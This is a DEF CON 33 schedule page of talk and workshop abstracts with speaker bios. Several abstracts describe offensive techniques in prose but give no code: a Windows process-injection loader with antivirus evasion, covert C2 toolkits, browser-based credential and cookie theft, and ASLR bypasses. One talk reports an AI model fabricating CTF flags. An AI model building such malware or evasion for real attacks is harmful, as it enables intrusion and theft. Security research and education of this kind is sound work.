Malware analysis often focuses on detonation, leaving new defenders and red‑teamers wondering how a loader is actually assembled. In this accelerated, beginner‑friendly, two‑hour hands‑on workshop, participants start with a ready‑to‑build Visual Studio solution and finish with a fully functional Windows 11 process‑injection loader written in C. We focus on the classic three‑call technique: VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread, plus a quick single‑byte XOR obfuscation pass and file bloating operation. All workshop time is devoted to getting a working loader, testing it against Windows Defender, and understanding each step well enough to particpants can expand beyond it.


[Course Outline]

  1. Environment Jump-Start 0.1 Cover Windows 11 snapshot with tools and skeleton code. 0.2 Confirm build of Loader.sln.

  2. Loader Fundamentals 1.1 Loader vs payload overview 1.2 Memory layout and why VirtualAllocEx / WriteProcessMemory / CreateRemoteThread works.

  3. Hands-On Build 2.1 VirtualAllocEx - reserve RWX in target. 2.2 WriteProcessMemory - copy shellcode. 2.3 CreateRemoteThread - execute and watch notepad.exe execute. 2.4 Breakpoint demo in x64dbg.

  4. Evasion 3.1 Wrap shellcode in XOR decoder stub. 3.2 Bloat file with appneded null bytes. 3.3 Show Defender detection before and after.

  5. Wrap-Up and Next Steps 4.1 Provide code branches: indirect-syscalls, AMSI-bypass 4.2 Safe research and legal reminders 4.3 Recommended reading links

SpeakerBio:  Royce Yaezenko

Malware developer and vulnerability researcher with a focus on red team tooling. A purveyor of CTFs and watcher of shellcode pop, they enjoy crafting PoCs and designing CTF challenges for the community. Their current research explores Windows malware development, covert communication channels, and fuzzing techniques.


Return to Index    -    Add to Google    -    ics Calendar file

ASV - Friday - 16:30-16:59 PDT


Title: Burning, trashing, spacecraft crashing: a collection of vulnerabilities that will end your space mission
When: Friday, Aug 8, 16:30 - 16:59 PDT
Where: LVCCWest-Level2-W228 - Map

Description:

The frequency of space missions has been increasing in recent years, raising concerns about security breaches and satellite cyber threats. Each space mission relies on highly specialized hardware and software components that communicate through dedicated protocols and standards developed for mission-specific purposes. Numerous potential failure points exist across both the space and ground segments, any of which could compromise mission integrity. Given the critical role that space-based infrastructure plays in modern society, every component involved in space missions should be recognized as part of critical infrastructure and afforded the highest level of security consideration.

This briefing highlights a subset of vulnerabilities that we identified within last couple of years across both ground-based systems and onboard spacecraft software. We will provide an in-depth analysis of our findings, demonstrating the impact of these vulnerabilities by showing our PoC exploits in action—including their potential to grant unauthorized control over targeted spacecraft. Additionally, we will show demonstrations of the exploitation process, illustrating the real-world implications of these security flaws.

Speakers:Andrzej Olchawa,Milenko Starcik,Ayman Boulaich,Ricardo Fradique

SpeakerBio:  Andrzej Olchawa, VisionSpace Technologies
No BIO available
SpeakerBio:  Milenko Starcik, VisionSpace Technologies
No BIO available
SpeakerBio:  Ayman Boulaich

Ayman Boulaich is a cybersecurity researcher specializing in vulnerabilities within aerospace systems. He has contributed to identifying critical security issues in NASA's open-source software frameworks, such as Core Flight System (cFS) and CryptoLib.

SpeakerBio:  Ricardo Fradique, Cybersecurity Engineer at VisionSpace Technologies GmbH

Ricardo Fradique is a Cybersecurity Engineer at VisionSpace Technologies GmbH, with a focus on Offensive Security and Vulnerability Research. He has been credited in several CVEs, and a regular CTF player.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Friday - 11:00-11:45 PDT


Title: C4 - Cross Compatible Command and Control
When: Friday, Aug 8, 11:00 - 11:45 PDT
Where: LVCCWest-Level2-W210 - Map

Description:

Let’s face it — traditional HTTP C2 is burning out. Between aging domains, TLS cert management, sandbox fingerprinting, and blue teams getting smarter at categorizing traffic and infrastructure, your custom C2 feels less covert and more like a liability. Red teams and threat actors alike are shifting toward living off legitimate services — AWS, GitHub, Box, Notion, whatever blends in — but building solutions that are custom to a single C2 framework? Let’s stop doing that. Let’s share the fun! C4 (Cross-Compatible Command & Control) is here to change that. It’s a modular toolkit of WASM-powered plugins that makes external C2 easy to implement, regardless of your implant's language or target OS. Whether you’re writing in C, Rust, Go, Python, C#, or something else entirely, C4 plugins can be loaded directly into your implant and run on Windows, macOS, or Linux. But the real game-changer? C4 provides a single, centralized collection of over 10 fully-documented, operationally-ready external C2 modules — not just proof-of-concepts, but production-level integrations with trusted sites that fly under the radar. No more hunting through GitHub repos, hand-rolling fragile API calls, or hacking together glue code for every new environment. Stop reinventing external C2 and start planting some C4 in your implants!

SpeakerBio:  Scott "ScottCTaylor12" Taylor, Senior Red Team Operator at Sony's Global Threat Emulation

Scott Taylor is a Senior Red Team Operator on Sony's Global Threat Emulation team. Scott has previously worked at the MITRE Corporation and T. Rowe Price focused on emulating adversary behaviors. While Scott has been a technical professional for a decade, only the second half was focused on offensive security. He started as a Linux system administration intern where he learned to build before later learning to break. Scott leverages his system administration background in his offensive security career where he passionately researches command and control (C2) infrastructure for red team operations. Open-source publications by Scott include custom C2 channels for popular C2 frameworks, leveraging cloud services for C2, and automating red team infrastructure deployment.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Saturday - 16:00-16:45 PDT


Title: C4 - Cross Compatible Command and Control
When: Saturday, Aug 9, 16:00 - 16:45 PDT
Where: LVCCWest-Level2-W210 - Map

Description:

Let’s face it — traditional HTTP C2 is burning out. Between aging domains, TLS cert management, sandbox fingerprinting, and blue teams getting smarter at categorizing traffic and infrastructure, your custom C2 feels less covert and more like a liability. Red teams and threat actors alike are shifting toward living off legitimate services — AWS, GitHub, Box, Notion, whatever blends in — but building solutions that are custom to a single C2 framework? Let’s stop doing that. Let’s share the fun! C4 (Cross-Compatible Command & Control) is here to change that. It’s a modular toolkit of WASM-powered plugins that makes external C2 easy to implement, regardless of your implant's language or target OS. Whether you’re writing in C, Rust, Go, Python, C#, or something else entirely, C4 plugins can be loaded directly into your implant and run on Windows, macOS, or Linux. But the real game-changer? C4 provides a single, centralized collection of over 10 fully-documented, operationally-ready external C2 modules — not just proof-of-concepts, but production-level integrations with trusted sites that fly under the radar. No more hunting through GitHub repos, hand-rolling fragile API calls, or hacking together glue code for every new environment. Stop reinventing external C2 and start planting some C4 in your implants!

SpeakerBio:  Scott "ScottCTaylor12" Taylor, Senior Red Team Operator at Sony's Global Threat Emulation

Scott Taylor is a Senior Red Team Operator on Sony's Global Threat Emulation team. Scott has previously worked at the MITRE Corporation and T. Rowe Price focused on emulating adversary behaviors. While Scott has been a technical professional for a decade, only the second half was focused on offensive security. He started as a Linux system administration intern where he learned to build before later learning to break. Scott leverages his system administration background in his offensive security career where he passionately researches command and control (C2) infrastructure for red team operations. Open-source publications by Scott include custom C2 channels for popular C2 frameworks, leveraging cloud services for C2, and automating red team infrastructure deployment.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Saturday - 11:00-11:45 PDT


Title: Caldera for OT - Oops! All Software
When: Saturday, Aug 9, 11:00 - 11:45 PDT
Where: LVCCWest-Level2-W208 - Map

Description:

Dive into the world of Operational Technology (OT) adversary emulation — no racks of hardware required. With Caldera for OT (C4OT) and our new virtual device simulators, you can explore the inner workings of OT network communications from the comfort of your own home lab. The biggest industrial control systems incidents — FrostyGoop, PIPEDREAM, Industroyer — didn’t rely on flashy zero-days to impact physical systems. Instead, they used native OT protocols to send valid messages with malicious intent. Now, with C4OT, you can step into the attacker’s shoes and explore the quirks and capabilities of protocols like Modbus, DNP3, and IEC61850. No hardware? No problem. No experience? Even better. In this session, we’ll show you how to get started with adversary emulation against simulated OT devices, unlocking a hands-on environment to test your attacks, validate your defenses, and gain practical insights into the world of industrial cybersecurity. Whether you’re a defender looking to understand the threats, a researcher diving into OT protocol behavior, or a red-teamer eager to sharpen your skills, C4OT gives you the tools to experiment safely and effectively. Join us to see how C4OT is revolutionizing adversary emulation for OT — one packet at a time.

Speakers:Devon Colmer,Tony Webber

SpeakerBio:  Devon Colmer

Devon serves as the lead for Caldera for operational technology (OT) within MITRE’s Critical Infrastructure Protection Innovation Center (CIPIC). He specializes in OT adversary emulation and detection engineering, leading the development of OT plugins for MITRE’s Caldera platform. Beyond Caldera, he is researching a common data model for OT protocols to lower the barrier of entry for OT network defenders.

SpeakerBio:  Tony Webber

Tony is the lead for counter measures for operational technology in MITRE’s Critical Infrastructure Protection Innovation Center (CIPIC). His work has spanned systems engineering, solution prototyping, capabilities development, and deployment of cybersecurity and cyber situational awareness solutions for defending industrial control systems. His current focus is adversary emulation for ICS and space systems.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Friday - 11:00-11:45 PDT


Title: Caldera for OT - Oops! All Software
When: Friday, Aug 8, 11:00 - 11:45 PDT
Where: LVCCWest-Level2-W211 - Map

Description:

Dive into the world of Operational Technology (OT) adversary emulation — no racks of hardware required. With Caldera for OT (C4OT) and our new virtual device simulators, you can explore the inner workings of OT network communications from the comfort of your own home lab. The biggest industrial control systems incidents — FrostyGoop, PIPEDREAM, Industroyer — didn’t rely on flashy zero-days to impact physical systems. Instead, they used native OT protocols to send valid messages with malicious intent. Now, with C4OT, you can step into the attacker’s shoes and explore the quirks and capabilities of protocols like Modbus, DNP3, and IEC61850. No hardware? No problem. No experience? Even better. In this session, we’ll show you how to get started with adversary emulation against simulated OT devices, unlocking a hands-on environment to test your attacks, validate your defenses, and gain practical insights into the world of industrial cybersecurity. Whether you’re a defender looking to understand the threats, a researcher diving into OT protocol behavior, or a red-teamer eager to sharpen your skills, C4OT gives you the tools to experiment safely and effectively. Join us to see how C4OT is revolutionizing adversary emulation for OT — one packet at a time.

Speakers:Devon Colmer,Tony Webber

SpeakerBio:  Devon Colmer

Devon serves as the lead for Caldera for operational technology (OT) within MITRE’s Critical Infrastructure Protection Innovation Center (CIPIC). He specializes in OT adversary emulation and detection engineering, leading the development of OT plugins for MITRE’s Caldera platform. Beyond Caldera, he is researching a common data model for OT protocols to lower the barrier of entry for OT network defenders.

SpeakerBio:  Tony Webber

Tony is the lead for counter measures for operational technology in MITRE’s Critical Infrastructure Protection Innovation Center (CIPIC). His work has spanned systems engineering, solution prototyping, capabilities development, and deployment of cybersecurity and cyber situational awareness solutions for defending industrial control systems. His current focus is adversary emulation for ICS and space systems.


Return to Index    -    Add to Google    -    ics Calendar file

PGE - Saturday - 22:00-01:59 PDT


Title: Call Center Village Party
When: Saturday, Aug 9, 22:00 - 01:59 PDT
Where: LVCCWest-Level2-W210 - Map

Description:

Join Call Center Village at Party Line, a carefully-crafted telephony-themed party open to all DEF CON 33 attendees. Help us celebrate the human operators who keep call centers and answering services private, usable, and accessible. Between the illuminated telephone decorations and the sponsor-supplied drink-ticket drops, you're bound to find something to dial up the fun.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Sunday - 10:30-11:15 PDT


Title: Can't Stop the ROP: Automating Universal ASLR Bypasses for Windows
When: Sunday, Aug 10, 10:30 - 11:15 PDT
Where: LVCCWest-Level1-Hall3-Track 3 - Map

Description:

High-entropy ASLR was supposed to make bypasses of ASLR on Windows virtually impossible - until now! This talk will debut nine novel bypasses of the strongest form of ASLR on Windows, which makes attacks such as brute-forcing totally infeasible. This talk showcases how mostly simple, easy-to-find ROP gadgets can be used to construct highly reliable, universal ASLR bypasses to key Windows system DLLs, allowing ROP gadgets from those DLLs to be used freely in exploits! The end result? The attack surface is greatly expanded, making it possible to do more attacks on binaries previously constrained by limited gadgets. What may have been impossible before due to insufficient ROP gadgets, now is quite possible! While this talk focuses primarily on ASLR bypass for x64, we will also briefly touch upon similar attacks for x86. As part of this talk, for the first time ever, I am also releasing and open-sourcing a new mini-tool that will generate complete, x64 ROP chains for each of these bypasses! We will see this ASLR bypass attack in action with demo. We conclude with recommendations to help remediate the problem. This talk is an in-depth technical deep dive into Windows internals and the design of this technique, but it will also be presented in an accessible way to beginners.

References:

SpeakerBio:  Bramwell Brizendine, Director at VERONA Lab

Dr. Bramwell Brizendine has a Ph.D. in Cyber Operations and is the Director of the VERONA Lab. Bramwell has regularly spoken at DEFCON and presented at all regional editions of Black Hat (USA, Europe, Asia, MEA), as well as at Hack in the Box Amsterdam and Wild West Hackin' Fest. Bramwell received a $300,000 NSA research grant to create the SHAREM shellcode analysis framework, which brings unprecedented capabilities to shellcode analysis. He has additionally authored ShellWasp, which facilitates using Windows syscalls in shellcode, as well as two code-reuse attack frameworks, ROP ROCKET and JOP ROCKET. Bramwell has previously taught undergraduate, master's, and Ph.D. courses on software exploitation, reverse engineering, offensive security, and malware analysis. He currently teaches cybersecurity courses at the University of Alabama in Huntsville.


Return to Index    -    Add to Google    -    ics Calendar file

PAYV - Friday - 10:30-10:59 PDT


Title: Card testing workshop
When: Friday, Aug 8, 10:30 - 10:59 PDT
Where: LVCCWest-Level1-Hall2-W505 - Map

Description:
SpeakerBio:  Vince Sloan
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

PAYV - Saturday - 10:30-10:59 PDT


Title: Card testing workshop
When: Saturday, Aug 9, 10:30 - 10:59 PDT
Where: LVCCWest-Level1-Hall2-W505 - Map

Description:
SpeakerBio:  Vince Sloan
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

PAYV - Friday - 11:00-11:59 PDT


Title: Carding is Dead, Long Live Carding: How MaaS is fueling NFC relay attacks
When: Friday, Aug 8, 11:00 - 11:59 PDT
Where: LVCCWest-Level2-W228 - Map

Description:

The payment fraud landscape is experiencing a resurgence of 'carding' through sophisticated Near Field Communication (NFC) relay attacks, which combine social engineering and custom mobile malware to bypass contactless payment security measures, enabling unauthorized transactions. A critical emerging trend is the proliferation of Malware-as-a-Service (MaaS) platforms, primarily operated by Chinese-speaking threat actors, who develop and distribute advanced NFC relay capabilities as turn-key solutions to global affiliates, facilitating complex card-present fraud schemes on an unprecedented scale and leading to arrests in the U.S. and EU. This MaaS operational model, featuring affiliate networks and advanced tools, signifies a critical evolution in financial threats, alarming global financial institutions and necessitating urgent adaptation of fraud prevention strategies. The discussion will explore MaaS operations, presenting key findings from the Supercard X analysis, including its technical capabilities, and examining the implications for the payment industry, with mitigation strategies and actionable intelligence such as actor communications and distinct Tactics, Techniques, and Procedures (TTPs) being shared. Furthermore, the talk will reveal how developers of well-known Android banking trojans are integrating NFC relay functionalities to enhance their cash-out techniques, providing attendees with a deep dive into NFC Relay MaaS, exclusive threat intelligence, and an understanding of the evolving fraud landscape, including the operational models, tools, and TTPs employed by modern NFC Relay MaaS platforms, as well as the systemic risks posed to global financial institutions and the urgent need for adaptive security postures.

Speakers:Federico Valentini,Alessandro Strino

SpeakerBio:  Federico Valentini, Cleafy

Federico Valentini is passionate about technologies in general and has a deep interest in cybersecurity, particularly Penetration Testing, Malware Analysis, and Social Engineering techniques. He's currently leading the Threat Intelligence Team and Incident Response at Cleafy. He oversees all the activities related to monitoring and uncovering new threats and attack patterns that malicious actors use. He has spoken at HackInBO 2022, Botconf 2023, Cert-EU 2023, BSides Cyprus 2023, FS-ISAC 2024, Botconf 2025, and other private events managed by CertFIN in the Italian territory.

SpeakerBio:  Alessandro Strino, Senior Malware Analyst at Cleafy

Alessandro Strino has a solid background in Penetration testing and modern malware analysis. His main research topics are binaries and computer forensics. Nevertheless, he is passionate about binary exploitation, reverse engineering, and privilege escalation techniques. He now works as a senior malware analyst at Cleafy. He has spoken at Botconf 2023, Cert-EU 2023, BSides Cyprus 2023, FS-ISAC 2024, and Botconf 2025.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Sunday - 12:00-12:45 PDT


Title: Carding, Sabotage & Survival: A Darknet Market Veteran’s Story
When: Sunday, Aug 10, 12:00 - 12:45 PDT
Where: LVCCWest-Level1-Hall3-Track 5 - Map

Description:

For over 10 years, I've operated at every level of darknet markets - from carding forums to multi-million dollar platforms. This is the unfiltered reality they don't teach you:

I'll share never-before-seen screenshots, chat logs, and operational details that reveal why no market lasts forever. Whether you're a researcher, journalist, or just curious - this is the uncensored history of the darknet's most infamous moments.

References:

SpeakerBio:  Godman666

godman666 has operated in the darknet’s criminal underbelly for over a decade. Starting with carding at 16, he moved to spam operations before rising through Silk Road and Tor carding forums. He built phishing empires, sold hacking tools, and ran infrastructure for major markets—including engineering the darknet’s largest phishing operation after a fallout with Empire Market’s staff. A backend role at a top market later ended in financial sabotage (ask about Christmas 2019). Recognized in Wired’s "The Most Dangerous People on the Internet" (2022), he shifted to offshore legal warfare takedown arbitrage, Wikipedia edits, and creative compliance. DEF CON’s Darknet Market Contest? Sabotaged by a hangover.


Return to Index    -    Add to Google    -    ics Calendar file

CRE - Friday - 10:00-17:59 PDT


Title: Career Fair: Interview Tips and Referral
When: Friday, Aug 8, 10:00 - 17:59 PDT
Where: LVCCWest-Level1-Hall4-Communities-C104 - Map

Description:

Join us on Day 1 of DEFCON for an insightful session on mastering interview techniques and leveraging referrals in the cybersecurity industry. Learn from experts about the best practices to ace your interviews and how to effectively network to get those valuable referrals

Speakers:Krity Kharbanda,Aastha Sahni

SpeakerBio:  Krity Kharbanda, Senior Application Security Engineer at ServiceNow

Krity is currently working as Senior Application Security Engineer at ServiceNow.

SpeakerBio:  Aastha Sahni, Security Analyst II at Microsoft

Aastha is currently working as Security Analyst II at Microsoft.


Return to Index    -    Add to Google    -    ics Calendar file

CRE - Saturday - 10:00-17:59 PDT


Title: Career Fair: Resume Review
When: Saturday, Aug 9, 10:00 - 17:59 PDT
Where: LVCCWest-Level1-Hall4-Communities-C104 - Map

Description:

On Day 2 of DEFCON, bring your resume for a comprehensive review by industry professionals. Get personalized feedback and tips to enhance your resume, making it stand out to potential employers in the cybersecurity field.

Speakers:Ruchira Pokhriyal,Harini Ramprasad

SpeakerBio:  Ruchira Pokhriyal, Senior Threat Detection and Response Engineer at Lending Club

Ruchira is currenty working as a Senior Threat Detection and Response Engineer at Lending Club.

SpeakerBio:  Harini Ramprasad, Security Engineer at Snap

Harini is currently wokring as Security Engineer at Snap.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Friday - 12:30-13:15 PDT


Title: Cash, Drugs, and Guns: Why Your Safes Aren't Safe
When: Friday, Aug 8, 12:30 - 13:15 PDT
Where: LVCCWest-Level1-Hall3-Track 4 - Map

Description:

When Liberty Safe was found to have provided safe unlock codes to authorities, it made us wonder; how was it even possible for Liberty to do this? Our talk will cover the vulnerabilities we found and journey into the various families of locks made by SecuRam, the OEM of safe locks used by Liberty Safe and other Safe vendors. Our exploration began with an “analog” lock from Liberty Safe but quickly expanded to SecuRam’s “digital” lock lines, where we found a debug port that allowed access to all firmware and data. Through this, we discovered that codes are stored on the externally accessible keypad, rather than securely inside the safe (as well as other issues). These locks, deployed widely in consumer, and commercial safes at major retail chains exhibit vulnerabilities that enable opening them in seconds with a Raspberry Pi. We invite you to our session to see us crack UL-certified High-Security Electronic Locks live!

References:

See our slides for detailed citations.

Speakers:Mark Omo,James Rowley

SpeakerBio:  Mark Omo

Mark Omo is a professional security researcher and engineer, but mostly a fearless leader, a job which he definitely loves way more than actually hacking things. Mark has a background in Consumer and Medical and Aerospace products. He spends his days making PowerPoints and his nights hacking away on embedded hardware.

SpeakerBio:  James Rowley

James Rowley is a professional security researcher and engineer who loves that job so much he does it in most of his free time too. Aside from cracking electronic safe locks, he has years of experience working on embedded security, and helping build better products there; he has presented on those topics at Hardwear.io in the past. He has been hacking and making things since childhood, eventually making it a career. Born, raised, and still living in the Southwest US, he loves exploring and photographing that desert environ almost as much as tearing down products.


Return to Index    -    Add to Google    -    ics Calendar file

BBV - Saturday - 17:30-17:59 PDT


Title: Cheat Code for Hacking on T-Mobile: From Inside the TMO BBP Perspective
When: Saturday, Aug 9, 17:30 - 17:59 PDT
Where: LVCCWest-Level3-W326 - Map

Description:

Ever wondered what happens after you hit "submit" on a bug bounty report? At T-Mobile, each submission kicks off a behind-the-scenes journey that spans teams, tools, and time zones. In this talk, we’ll walk through the lifecycle of a bug bounty submission—from Bugcrowd’s triage desk to our internal security workflows—and show why not every finding is considered equal from a business risk perspective.

SpeakerBio:  Elisa Gangemi, Senior Cybersecurity Engineer at T-Mobile

Elisa Gangemi is a Senior Cybersecurity Engineer on the OffSec Team at T-Mobile, where they manage the Penetration Testing Pipeline and contribute to the company’s Bug Bounty Program. With prior experience in offensive and product security at startups, Elisa helped launch vulnerability management programs, including bug bounty initiatives and security tooling. They began their technology career as a QA tester, then transitioned into InfoSec at Akamai Technologies, working on technical program management and security research. Elisa holds the GIAC GWAPT certification and serves on the GIAC Advisory Board. They’ve enjoyed learning hacking techniques and have participated in a U.S. team that twice placed in the top four at NorthSec’s CTF in Montreal. DEF CON 33 marks their first year attending and speaking.


Return to Index    -    Add to Google    -    ics Calendar file

PLV - Saturday - 16:00-16:30 PDT


Title: China's Health Sector Ambitions and Information Needs: Implications for U.S. Health Care Cyber Defense
When: Saturday, Aug 9, 16:00 - 16:30 PDT
Where: LVCCWest-Level2-W228 - Map

Description:
SpeakerBio:  Amelia Shapiro
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

DCT - Friday - 11:30-12:15 PDT


Title: ChromeAlone: Transforming a Browser into a C2 Platform
When: Friday, Aug 8, 11:30 - 12:15 PDT
Where: LVCCWest-Level1-Hall3-Track 4 - Map

Description:

A long time ago, browsers were wrappers for HTTP web requests and little else. The modern browser, however, is crammed with so many features that it is practically an operating system. This talk will demonstrate how to (ab)use years of legacy features along with recent additions to Google Chrome to mimic the capabilities of a conventional C2 implant while evading traditional endpoint protection.

We will introduce our new open-source framework "ChromeAlone" which implements features such as proxying raw TCP traffic, phishing for Yubikey USB codes, dumping cookies and credentials, keylogging browser windows, and executing shell commands from Chrome. Our implementation leverages Chrome's built-in features, sideloads malicious components without user interaction, and obfuscates code using WebAssembly to evade detection. This research exposes significant security implications of Chrome's expanding feature set and the challenges of securing modern browsers against abuse.

References:

SpeakerBio:  Michael "bouncyhat" Weber

Michael Weber is a member of the Praetorian Security Labs team where he creates tools to help his fellow consultants not stay up until 2am hunting for material risks. He specializes in chrome shenanigans, malware development, vulnerability research, and online poker datamining.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Saturday - 12:30-13:15 PDT


Title: Claude--Climbing a CTF Scoreboard Near You
When: Saturday, Aug 9, 12:30 - 13:15 PDT
Where: LVCCWest-Level1-Hall3-Track 3 - Map

Description:

Over the past few months, we've thrown Claude into the digital trenches of multiple cybersecurity competitions—from defending vulnerable networks at CCDC to cracking challenges in PicoCTF and HackTheBox. In this talk, I'll take you through our journey deploying an AI assistant against human red teams and live CTF challenges. I'll show you Claude's unexpected wins (landing in the top 3% globally in PicoCTF and successfully fending off red team attacks at CCDC) alongside its entertaining fails (devolving into security philosophy when overwhelmed, making up flags for PlaidCTF when stuck).

Drawing on these results, I'll break down the technical challenges we conquered, from building specialized tooling harnesses to keeping Claude coherent during 16+ hour competitions. This presentation will demonstrate how competitive environments reveal both the impressive capabilities and amusing limitations of today's AI systems when operating in adversarial scenarios. Join me to see what happens when an assistant trained to be helpful gets dropped into the dynamic world of CTFs and defense competitions—and what this teaches us about AI's true potential in cybersecurity.

References:

SpeakerBio:  Keane Lucas, Member of Technical Staff at Anthropic

Keane is a researcher on Anthropic's Frontier Red Team focused on stress-testing AI model cybersecurity capabilities. Before joining Anthropic, Keane served as a Cyberspace Operations Officer in the US Air Force and earned his PhD at Carnegie Mellon, where his research focused on applying machine learning to malware detection.


Return to Index    -    Add to Google    -    ics Calendar file

MWV - Friday - 16:30-16:59 PDT


Title: ClickFix: The Malware Delivery Technique Enabling Ransomware Affiliates and State-Sponsored APT Operations
When: Friday, Aug 8, 16:30 - 16:59 PDT
Where: LVCCWest-Level1-Hall1-W303 - Map

Description:
SpeakerBio:  Arda Büyükkaya
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

DCT - Saturday - 12:00-12:45 PDT


Title: Client or Server? The Hidden Sword of Damocles in Kafka
When: Saturday, Aug 9, 12:00 - 12:45 PDT
Where: LVCCWest-Level1-Hall3-Track 1 - Map

Description:

Apache Kafka is an open-source distributed event streaming platform. At the heart of Kafka lies the Broker, which acts as the central server node in a Kafka cluster. Brokers are responsible for storing streams of data and managing the flow of messages between producers and consumers. The Kafka Server we often refer to is essentially the Kafka Broker.

While Kafka’s main system handles data streams well, its real strength comes from its growing ecosystem. The components in the ecosystem greatly expands its abilities: Confluent ksqlDB transforms raw streams into queryable tables for real-time analytics; Schema Registry standardizes data formats across microservices, and so on.

However, behind the rich components lie hidden security threats. Prior research has revealed Remote Code Execution (RCE) vulnerabilities in Kafka Client, yet notably absent were any exploitable RCE vulnerabilities in the Kafka Server — until now. In this work, we present the first-ever RCE vulnerability affecting Kafka Server itself. At the same time, we also used similar techniques to attack other components in the Kafka ecosystem. And these vulnerabilities can also affect the cloud service providers themselves. What's more, Since Kafka users remain unaware of this risk, thousands of Kafka servers are now exposed to this RCE vulnerability.

Speakers:Ji'an "azraelxuemo" Zhou,Ying Zhu,ZiYang "lz2y" Li

SpeakerBio:  Ji'an "azraelxuemo" Zhou

Ji'an Zhou is a Security Engineer in Alibaba Cloud. He is focusing on Java security and cloud native security and his work helped many high-profile vendors improve their products' security, including Google, Amazon, Cloudera, IBM, Microsoft, Oracle. He has previously spoken at Black Hat , Zer0Con, Off-by-One Con.

SpeakerBio:  Ying Zhu

Ying Zhu is a Security Engineer in Alibaba Cloud. He is interested in Web application security, especially Java application security. He has reported many critical vulnerabilities to Amazon, Apache, Cloudera, Microsoft, etc.

SpeakerBio:  ZiYang "lz2y" Li

Ziyang Li is a Security Engineer in Alibaba Cloud. He is focused on Java security and security products. He has reported many critical vulnerabilities to Amazon, Apache, Cloudera, Microsoft, etc.


Return to Index    -    Add to Google    -    ics Calendar file

DCW - Sunday - 09:00-12:59 PDT


Title: Cloud Forensics Workshop: Smart Grid Edition
When: Sunday, Aug 10, 09:00 - 12:59 PDT
Where: LVCCNorth-Level2-N256 - Map

Description:

Every watt and bit tells a story.

The concept of "smart grids" dates back to the 1970s with automatic meters, but the term emerged with the Energy Independence and Security Act of 2007. Since 2012, the integration of smart grids and Cloud computing has been a topic at IEEE meetings. This raises key questions: How do we assess risks to physical and virtual infrastructure? What are the impacts of a breach? Where does digital forensics fit in?

Since 2017, the Cloud Forensics Workshop has introduced security professionals to core Cloud forensics concepts. The latest Smart Grid Edition explores the relationship between smart grids, Cloud computing, and digital forensics. Participants will engage in hands-on labs using open-source tools to identify indicators of compromise (IoCs), acquire forensically sound artifacts, and apply AI and automation in investigations. Registered students will download sample data before the workshop and apply their skills in a live tabletop exercise.

SpeakerBio:  Kerry "Professor Kilroy" Hazelton

Kerry Hazelton - also known as "Professor Kilroy" - has been involved in the technology and security industry for over twenty-five years crafting his own version of "Protection Against the Dark Arts" with an extensive knowledge of information systems, data center operations, Cloud computing, digital forensics, and incident response.

Ever the security enthusiast and a sucker for movie references, combined with a deep passion for teaching and mentoring; Mr. Hazelton created the Cloud Forensics Workshop and CTF Challenge in 2017, which is a technical workshop that focuses on learning about the science of Cloud forensics and its real-world applications, followed by a Capture-the-Flag competition to gauge his students’ comprehension and critical-thinking skills by solving multiple forensic puzzles in a race against each other within the allotted amount of time.

He can be found posting his random thoughts on gaming, hacking, or life in general somewhere on the medium known as the Internet.


Return to Index    -    Add to Google    -    ics Calendar file

SEV - Sunday - 10:45-11:30 PDT


Title: Cold Calls
When: Sunday, Aug 10, 10:45 - 11:30 PDT
Where: LVCCWest-Level3-W317-W319 - Map

Description:

This is your last chance to place a phone call from inside the soundproof booth! You know you want to!


Return to Index    -    Add to Google    -    ics Calendar file

SEV - Saturday - 15:30-17:59 PDT


Title: Cold Calls
When: Saturday, Aug 9, 15:30 - 17:59 PDT
Where: LVCCWest-Level3-W317-W319 - Map

Description:

Want to give vishing a shot? Step into our soundproof booth, grab a mystery target with its number and three challenge tiers, and see if you can nail easy, medium, and hard objectives - first come, first served!


Return to Index    -    Add to Google    -    ics Calendar file

SEV - Friday - 17:00-17:59 PDT


Title: Cold Calls
When: Friday, Aug 8, 17:00 - 17:59 PDT
Where: LVCCWest-Level3-W317-W319 - Map

Description:

Got nerves of steel? Step into our soundproof booth, grab a mystery target with its number and three challenge tiers, and see if you can nail easy, medium, and hard objectives - first come, first served!


Return to Index    -    Add to Google    -    ics Calendar file

MWV - Friday - 14:30-14:59 PDT


Title: Compromising Threat Actor Communications
When: Friday, Aug 8, 14:30 - 14:59 PDT
Where: LVCCWest-Level1-Hall1-W303 - Map

Description:
SpeakerBio:  Ben "polygonben" Folland

Ben Folland is a Security Operations Analyst at Huntress, where he manages hands-on-keyboard intrusions and dismantles active threats daily. Before that, he worked at one of Accenture’s SOCs, defending UK Critical National Infrastructure, gaining deep experience in high-stakes environments. He's all about DFIR, malware analysis, and threat hunting—and has a knack for exposing adversary tradecraft. Ben's spoken at over 10 conferences (including six BSides), taught SOC workshops at universities, is GIAC GCFA certified, and was a finalist for the UKs national cyber team. Whether it's CTFs or live incidents, Ben thrives on the chase and brings a hacker mindset to everything he does.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Sunday - 13:30-14:59 PDT


Title: Contest Closing Ceremonies & Awards
When: Sunday, Aug 10, 13:30 - 14:59 PDT
Where: LVCCWest-Level1-Hall3-Tracks 1-2 - Map

Description:

Return to Index    -    Add to Google    -    ics Calendar file

CHV - Friday - 16:30-16:59 PDT


Title: Context Aware Anomaly Detection in Automotive CAN Without Decoding
When: Friday, Aug 8, 16:30 - 16:59 PDT
Where: LVCCWest-Level2-W231 - Map

Description:

Modern vehicles operate as real-time cyber-physical systems, where even subtle manipulations on the CAN bus can lead to catastrophic outcomes. Traditional anomaly detectors fall short when malicious actors mimic expected sensor behaviors while altering the vehicle's state contextually. This talk explores how exploiting inter-signal correlations — rather than relying on individual identifiers or decoding — uncovers stealthy attacks. We present a deep sequence-learning approach tailored for raw CAN payloads, focusing on time-aware and context-sensitive detection. No reverse engineering of signal structures. Just patterns, timing, and trust redefined. Live demo included using real-world CAN datasets and emulated environments.

SpeakerBio:  Ravi Rajput
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

IOTV - Friday - 15:00-15:59 PDT


